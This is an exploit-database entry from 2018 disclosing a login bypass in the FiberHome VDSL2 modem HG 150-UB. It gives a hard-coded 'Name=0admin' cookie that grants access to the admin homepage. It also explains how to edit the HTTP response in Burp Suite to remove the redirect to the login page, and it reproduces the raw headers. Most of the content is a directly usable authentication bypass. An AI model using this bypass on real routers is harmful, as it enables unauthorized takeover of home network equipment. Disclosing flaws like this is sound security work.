FiberHome VDSL2 Modem HG 150-UB Login Bypass Vulnerability

2018-04-04T00:00:00
ID 1337DAY-ID-30117
Type zdt
Reporter Noman Riffat
Modified 2018-04-04T00:00:00

Description

Exploit for hardware platform in category web applications

                                        
                                            # Exploit Title: FiberHome VDSL2 Modem HG 150-UB Login Bypass
# Exploit Author: Noman Riffat
# Vendor Homepage: http://www.fiberhome.com/

The vulnerability exists in plain text & hard coded cookie. Using any
cookie manager extension, an attacker can bypass login page by setting
the following Master Cookie.

Cookie: Name=0admin

Then access the homepage which will no longer require
authentication.http://192.168.10.1/

Due to improper session implementation, there is another way to bypass
login. The response header of homepage without authentication looks
like this.

HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Set-Cookie: Name=; path=/
Content-Type: text/html
Connection: close

<html><head><script language='javascript'>
parent.location='login.html'
</script></head><body></body></html>HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Content-Type: text/html
Connection: close

<html>
<head>
.. continue to actual homepage source

The response header looks totally messed up and by triggering burp
suite and modifying it to following will grant access to homepage
without authentication.

HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Set-Cookie: Name=; path=/
Content-Type: text/html
Connection: close

<html>
<head>
.. continue to actual homepage source

#  0day.today [2018-04-05]  #